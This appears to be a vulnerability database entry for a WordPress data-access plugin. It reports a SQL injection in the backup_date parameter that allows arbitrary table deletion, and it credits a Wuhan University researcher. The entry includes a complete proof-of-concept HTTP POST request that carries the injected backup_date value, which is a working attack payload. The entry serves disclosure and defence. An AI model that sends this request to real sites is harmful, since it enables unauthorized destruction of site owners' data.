The plugin does not properly sanitise and escape the backup_date parameter before using it a SQL statement, leading to a SQL injection issue and could allow arbitrary table deletion
POST /wp-admin/admin.php?page=wpdataaccess&tab=repository HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 65 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 remove_one_backup=true&_wpnonce=a5df98f178&backup_date=`,`xxx.xxx
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2021-11-08 (about 1 years ago)
2021-11-08 (about 1 years ago)
2022-09-26 (about 12 months ago)